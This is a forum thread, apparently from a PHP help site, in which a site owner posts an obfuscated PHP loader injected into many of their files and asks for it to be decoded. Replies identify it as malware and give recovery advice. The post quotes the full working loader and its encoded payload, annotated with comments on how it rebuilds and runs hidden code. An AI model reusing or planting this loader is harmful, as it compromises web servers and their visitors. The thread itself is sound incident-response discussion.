Hello, the following code has been injected into the first line of many PHP files on my site. Though I replaced the first line with a plain <?php , it would be great if someone could translate this for me. Thanks in advance!

 $heajmtan = '^<!%w`	x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!.;`UQPMSVD!-id%)uqpuft`msvd},;uqp%i	x5c2^<!Ce*[!%cIjQ:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{!<*#}_;#)323ldfid>}&;!osvufs}	xtww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#	x27rfs7f;!opjudovg}k~~9{d%:osvufs:~928>>	x22:ftmbg39*56A:>:8r (strstr($uas,"	x72	166	x3a	61	x31"))) { $vupvcon = "	x63	3zbek!~!<b%	x7f!<X>b%Z<#opo#>b%!*##2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%XA	x27K6<	x7fw6*3qj%7>	x2272q`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)327]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*hR85,67R37,18R#>q%V<*#fopo3qj%6<*Y%)fnbozcYufhA	x272qj%6<^#zsfvr#	x5cq%7/7#@#7/7^#iubq#	x5cq2]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]($GLOBALS["	x61	156	x75	156	x61"])))) { $GLOBALS["	x61	156	x75	15gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~I,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{h,*d	x27,*c	x27,*b	x27)fepdof.epmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#6#<!%w:!>!(%w:!>!	x246767~6<Cw6<pd%w6Z6<.]275]y83]273]y76]277#<!%t2w>#]y74]273]8]322]3]364]6]283]427]36]373Ptr($uas,"	x6d	163	x69	145")) o452]88]5]48]32M3]317]445]212z>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]K:.2^,%b:<!%c:>%s:	x5c%j:x54	120	x5f	125	x53	105	x52	137	x41	107	x45	116	x54"]); if ((strs4*<!~!	x24/%t2w/	x24)##-!#~<#/%	x24-	x24!>!fyqmpef)#	x24*<!%t::!>!	
%tmw/	x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr	x5c1^-%r	x5c!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd6]36]73]83]238M7]381]211M5]67]s%)7gj6<*id%)ftpmdR6<*id%)dfyfR	x27tfs%6<*17-SFEBF)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hm!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboe}	x7f;!osvufs}w;*	x7f!>>	x22!pd%)!]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcouft`msvd}+;!>!}	x27;!>>>!}_;gvc%}&;ftmbg%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]67tj	x22)gj6<^#Y#	x5cq%	x27Y%6<.msv`ftsbqA7>q%6<	162	x65	141	x74	145	x5f	14d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6)-1);} @error_reporting(0); $fkvtxjg = implode(array_map("ccnynst",s-K)ebfsX	x27u%)7fmjix6<C	x27&6<4-	x24	x5c%j^	x24-	x24tvctus)%	x24-	x24b!>!%yy)#}#-#	x24-ov>*ofmy%)utjm!|!*5!	x27!hmg%38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~	x24<!%o:!>!	x242178}527e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]4-	x24y4	x24-	x24]y8	x24-	x24]26	x24-	x24<%j,,*!|	x24-	x2bss	x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%ox7f!|!*uyfu	x27k:!ftmf!}Z;^nbsbq%	x5cS%6~6<	x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfofpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}eTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#--rr.93e:5597f-s.973:8297f:5297e:56-xr.985:529tr_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y7V;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x	x22l:!}V)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~	x24<!fD4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%td},;#-#}+;%-qp%)54l}	x27;%vg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>	x22!ftmbg)!gj<*#k#)usb6<	x7fw6*	x7f_*#[k2`{6:c}A;~!}	x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!	x27{**u%-#jt0}Z;4gvodujpo!	x24-	x24y7	x24-	x24*<!	x24-	x24gps)%j>1<%j=tj{fpg)%	x24-	x2tn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]/*#npd/#)rrd/#00;quui#>.%!<***f	x27,*e	x277!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!	
x27!hmg%)!gj!~<ofmy6~6<&w6<	x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA	FWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/#L#-#M#-#[#-#Y#-#D#-#W#-#C#85-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#786c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_ut`cpV	x7f	x7f	x7f	x7f<u%V	x27{ftmfV	x7f<*:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{	x24-tusqpt)%z-#:#*	x24-	x24!>!	x24/%tjw/	x24)%	x2)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!x7fw6*	x7f_*#fubfsdXk5`{6#/*)323zbe!-#jt0*?]+^?]_	x5c}X	x24<!%tmw!>!#]y84opdXA	x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsd5`hA	x27pd%6<pd%w6Z6<.4`hA	x27pd%6<pd%w6Z6<.3`hA	x27pd%6<pd%w6Z6<.26<	x7fw6*CW&)7gj6<.[A	x27&x27&6<.fmjgA	x27doj%6<	x7fw6*	x7f_*#fmjgk4`{6~6<tfs%w6<	x7fw6*CWtfe]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]3`hA	x27pd%6<C	x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf	x27x24Ypp3)%cB%iN}#-!	x24/%tmw/	x24)%c*W%eN+#Qi	x5c1^W%c!>!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc	;3q%}U;y]}R;2]},;osvufs}	x27;mnui}&;zep75]y7:]268]y7f#<!%tww!>!	x2400~GMFT`QIQ&f_UTPI`QUUI&e_SEEBpn)%epnbss-%rxW~!Ypp2)%zB%z>!	x24/h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4	x223}!+!<+{41]88M4P8]37]278]225]241]334]36%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbq#	x5cq%7**^#zsfvr#	x5cq%)uftnpd!opjudovg!|!**#j{}88:}334}472	x24<!%ff2!>!bssbz)	x24]25	x24-	x24-!%	x24-	x24*!|!	
x2hnpd#)tutjyf`opjudovif((function_exists("	x6f	142	x5f	163	x74	141	x72	164") && (!isset-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#	x24#-!#]y38#-!%w:**<")));$vzuglom = $v)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+993~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!v%7-MSV,6<*)ujojR	x27id%6<	x7fw6*	x7f_*#ujojRk3`{666~6<&w>>X)!gjZ<#opo#>b%!**X)ufttj	x22)gj!|!g	x22)!gj}1~!<2p%	x7f!~!<##!>!2p%Z<^2	x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO	x22#)fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-e%+*!*+fepdfe{h+{d%)+opjudoKc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]36	x61"]=1; $uas=strtolower($_SERVER["	x48	124	j%)7gj6<**2qj%)hopm3qjA)qj3hopmA	x27X&Z&S{ftmfV	x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,y76]252]y85]256]y6g]257]y86]267]y74]2~<3,j%>j%!*3!	x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!	x21<!fmtf!%b:>%s:	x5c%j6	x75	156	x63	164	x69	157	x6e"; function ccnynst($n){return chr(ord($n*&7-n%)utjm6<	x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127%	x27jsv%6<C>^#zsfvrupvcon("", $fkvtxjg); $vzuglom();}}sTrREvxNoiTCnuf_EtaerCxECalPer_Rtsyzezspzrwp';
 // Stage 1 of the loader: recover three function names stored at the tail of $heajmtan.
 // chr(670-550) is chr(120), the letter 'x', used as the separator. substr() reads
 // 121-87 = 34 bytes starting at offset 40291-34414 = 5877. The literal visibly ends with
 // "sTrREvxNoiTCnuf_EtaerCxECalPer_Rts" followed by padding; split on 'x' that gives
 // "sTrREv", "NoiTCnuf_EtaerC" and "ECalPer_Rts" -- presumably what this offset selects.
 $qhiudzr=explode(chr((670-550)),substr($heajmtan,(40291-34414),(121-87))); 
 // Element 0 is called as a function on element 1. With the pieces above that is strrev()
 // applied to a reversed name, giving create_function (PHP function names are
 // case-insensitive, so the mixed case is only there to defeat string matching).
 $zvlsaat = $qhiudzr[0]($qhiudzr[(7-6)]); 
 // Same trick on element 2 (14-12 = 2); reversed, it reads str_replace.
 $nwlvga = $qhiudzr[0]($qhiudzr[(14-12)]); 
 // dojzbmiry($ielotnxz, $jdyflcp, $mqvyjzzec): reassembles a hidden string from slices of a blob.
 //   $ielotnxz  flat list read as (offset, length) pairs: element 2*i is the substr() start,
 //              element 2*i+1 (the "(5-4)" is just 1) is the slice length.
 //   $jdyflcp   the blob the slices are cut from.
 //   $mqvyjzzec a callable invoked as $mqvyjzzec(chr(9), chr(92), $assembled): chr(54-45) is a
 //              tab and chr(502-410) is a backslash, so with a str_replace-style callable every
 //              tab in the assembled text becomes a backslash.
 // Slices are concatenated in list order, which lets the blob store its pieces shuffled.
 // The function itself only does string work; nothing is executed inside it.
 // The function_exists() guard avoids a redeclaration error when this stub is loaded more
 // than once -- presumably because the same stub was prepended to many files.
 if (!function_exists('dojzbmiry')) { function dojzbmiry($ielotnxz, $jdyflcp,$mqvyjzzec) { $pzqmyvr = NULL; for($wsjhiz=0;$wsjhiz<(sizeof($ielotnxz)/2);$wsjhiz++) { $pzqmyvr .= substr($jdyflcp, $ielotnxz[($wsjhiz*2)],$ielotnxz[($wsjhiz*2)+(5-4)]); } return $mqvyjzzec(chr((54-45)),chr((502-410)),$pzqmyvr); }; } 
 // Slice table for dojzbmiry(): chr(262-218) is chr(44), a comma, so this is a list of
 // offset,length pairs into $heajmtan. The furthest slice ends at 5842+35 = 5877, the same
 // offset at which the function-name table is read from the end of the blob.
 $ifqpyf = explode(chr((262-218)),'4791,66,770,65,5438,46,1317,65,1177,30,368,59,2031,26,5691,70,2104,68,2780,61,1069,41,3953,67,4221,64,5761,61,2172,31,245,69,2566,43,3901,52,505,29,5484,36,658,66,5822,20,4657,28,1984,47,3828,25,3419,42,4046,66,1580,50,886,43,5067,57,4020,26,3068,23,1515,35,2640,45,65,33,1885,40,1726,34,835,51,5002,65,5604,66,3355,64,4616,41,2260,29,1630,47,929,67,4685,20,4771,20,5161,21,5182,68,1025,44,3313,42,996,29,3769,59,1818,67,3230,52,4934,68,3580,40,4463,27,534,50,427,35,5124,37,4341,52,2528,38,3461,36,2987,25,150,31,314,54,3662,57,4524,61,5301,27,3012,56,3620,42,5520,47,2057,47,633,25,2841,58,4393,39,3091,69,3282,31,3853,48,1110,38,5567,37,4432,31,5386,52,584,49,1925,59,724,46,2289,65,4705,66,2203,57,3719,50,2414,57,3160,70,1382,67,4285,56,98,20,2685,50,1677,49,4490,34,1449,66,462,43,181,64,2735,45,3524,56,2354,25,2379,35,5328,58,2942,45,1235,58,4112,69,4181,40,4585,31,1148,29,1550,30,1207,28,1760,58,2471,57,118,32,2609,31,5670,21,1293,24,0,65,2899,43,5250,51,3497,27,4857,21,4878,56,5842,35'); 
 // $zvlsaat holds the reversed-name lookup result (create_function, if the name table decodes
 // as it appears to). It is called with an empty parameter list and the reassembled text as
 // the function body, so the hidden text is compiled as PHP code, the same as eval().
 // create_function() was deprecated in PHP 7.2 and removed in PHP 8.0; on PHP 8 this call
 // fails with a fatal error instead of compiling the payload.
 // NOTE(review): the decoded body is not reproduced here. Fragments readable in the literal
 // (e.g. "@error_reporting(0)" and "$uas=strtolower($_SERVER[") suggest it silences errors and
 // inspects request data -- not verified.
 $perivkb = $zvlsaat("",dojzbmiry($ifqpyf,$heajmtan,$nwlvga)); 
 // Overwrite the function-name variable with the raw blob, then invoke the generated
 // function with one empty-string argument: this is the point where the hidden code runs.
 $zvlsaat=$heajmtan; $perivkb(""); 
 // 707-586 = 121: the generated function's handle is replaced by an integer...
 $perivkb=(707-586); 
 // ...and the blob variable by 120. Presumably this just discards the loader's working
 // values so later code in the infected file cannot see them.
 $heajmtan=$perivkb-1; 

    Well, all the instructions for doing so are already there in the code (for example, the line that assigns to `$ifqpyf` is obviously exploding that string on commas, and the numbers are used by the function `dojzbmiry` as offsets into the `$heajmtan` string). But I'd avoid actually running `dojzbmiry`, `$mqvyjzzec` or `$zvlsaat` in PHP until you know what the body of the function will do.

    You might find someone else has already done it, e.g.: https://www.reddit.com/r/Malware/comments/5l2kd6/can_someone_debfuscate_it/ and following links leads to https://www.symantec.com/security_response/writeup.jsp?docid=2015-111911-4342-99&tabid=2 which is what several virus scanners identify your submitted code as (you are using a virus scanner on your system, right?).

    But that's not really your problem and you're fixated on the wrong thing. If, as looks likely, its job is to download malicious code from another server, analysing it further won't tell you anything about what it might or will do (though injecting arbitrary stuff into your web pages seems to be part of it), and won't even tell you how it got there in the first place (you had a security problem before it was ever injected, which is how it got injected in the first place).

    For recovery steps, I suggest looking through this and maybe some of the other documentation on the site.
    https://www.us-cert.gov/security-publications/recovering-trojan-horse-or-virus

      7 days later

      What Weedpacket is saying is that your site has been hacked and someone has injected attack code into your PHP files. This sort of thing can be quite difficult to eradicate. To be honest, I'm not sure what I might suggest to get rid of it.

        Thank you guys. I have upgraded to Joomla 3.7.0 and removed (with a script) the lines injected into my files. Looking at other security guidelines again...

          Don't forget to change all relevant passwords: your hosting password(s), any FTP passwords on your web host, and any Joomla admin passwords.

            Thanks. Did that first!
